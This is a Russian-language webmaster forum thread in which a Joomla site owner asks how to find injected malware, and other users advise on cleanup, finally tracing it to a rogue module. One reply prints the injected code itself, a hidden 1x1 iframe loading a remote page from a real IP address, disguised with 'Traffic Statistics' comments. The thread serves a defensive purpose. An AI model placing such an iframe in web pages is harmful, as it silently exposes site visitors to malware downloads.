Залез вирус

MantroniX
На сайте с 17.05.2007
102
807

Здравствуйте, не так давно зашёл на свой сайт и обнаружил вирус xttp://61.155.8.157/iframe/wp-stats.php Trojan-Downloader.HTML.Agent.is

Попробывал найти код, но безуспешно, не получается...

Кто силён в этом деле пожалуйста подскажите как можно найти код?

спасибо

двиг Joomla

Старый воин, мудрый воин!
fima32
На сайте с 12.01.2006
132

Ну во первых сделайте ссылку некликабельной или надо сразу предупреждать людей, чтобы в нее не тыкали.

А во-вторых урл пострадавшего в студию

parMaster
На сайте с 25.07.2007
43
MantroniX:
Здравствуйте, не так давно зашёл на свой сайт и обнаружил вирус xttp://61.155.8.157/iframe/wp-stats.php Trojan-Downloader.HTML.Agent.is
Попробывал найти код, но безуспешно, не получается...
Кто силён в этом деле пожалуйста подскажите как можно найти код?
спасибо
двиг Joomla

Adware, где-то засветили параметры доступа (FTP или что у вас там), "Попробывал найти код, но безуспешно" - плохо искали, или вообще не искали, грепните код на javascript, обычно они делают шифрованный код, дешифрование жаваскриптом. сделайте в браузере "Просмотр HTML кода" , когда найдете, гдепайте все исходники на разные части этого джаваскрипта. Имел неосторожность заразить подобным правительственный портал, поищите внимательнее во всех исходниках, обычно такое прячут в тех местах до которых вы е скролите редактором (очень далеко справа), внимательнее надо быть.

Удобный сервис закладок (http://vzakladki.com.ua) ICQ: 280060143
WebZoom
На сайте с 05.04.2008
81

fima32 +1

урл в студию

на всякий случай, сам код имеет примерно такой вот вид (недавно у своего клиента вычищал):

<!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

🚬

Если вы не имеете лучшего, используйте наилучшим образом то, что имеете. AURI SACRA FAMES
P
На сайте с 18.07.2008
8

Такой вирус обычно забирается в файлы с расширением .php, чаще всего в index.php. Проверьте первым делом их. Если не нашли, то выкачивайте все файлы себе и локально с помощью Avsearch'a например ищите в файлах фразу "iframe".

P.S.: после того, как почистите все файлы, обязательно меняйте пароль на фтп и проверяйте свой компьютер на всякие вирусы, тройны и спайваре.

fima32
На сайте с 12.01.2006
132
Procedurov:
P.S.: после того, как почистите все файлы, обязательно меняйте пароль на фтп и проверяйте свой компьютер на всякие вирусы, тройны и спайваре.

Я думаю, надо сначала найти у себя вирусы, а потом только менять пароли к фтп, иначе опять упрут.

Dwarf_V
На сайте с 23.01.2008
75

Согласен с Firma32 - надо сначала у себя вирусы найти, у меня такое тоже было. надо также нормальный антивирус поставить. Тоже был прикол с вирусом в index файлах. у меня KIS стоит так он эти файлы сразу видит. код приблизительно такой был - <!--iframe-->длинный код</frame>. и так в каждом php и html файлах.

WebZoom
На сайте с 05.04.2008
81

Кстати вспомнил, откуда взялся тот код у клиетна - в Джумле был установленн левый модуль, который и выводил этот код Зайдите в раздел "Модули", и посмотрите, какой модуль был добавлен последним по дате.

MantroniX
На сайте с 17.05.2007
102
WebZoom:
Кстати вспомнил, откуда взялся тот код у клиетна - в Джумле был установленн левый модуль, который и выводил этот код Зайдите в раздел "Модули", и посмотрите, какой модуль был добавлен последним по дате.

большое спасибо, действительно нашёл этот заражённый модуль удалил и больше каспер не орёт:)

Почему так долго не отвечал? хочу сказать модератору Коля Дубр публичное ИДИ ТЫ #### или стучи в icq 214215609 за ОЧЕНЬ обидное оскорбление в отзыве и бан на неделю

[Удален]

Я если у меня сайт хакера ламают ставлю схдники на проверку антивирусу. Он сам убирает все вредоносные скрипты

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий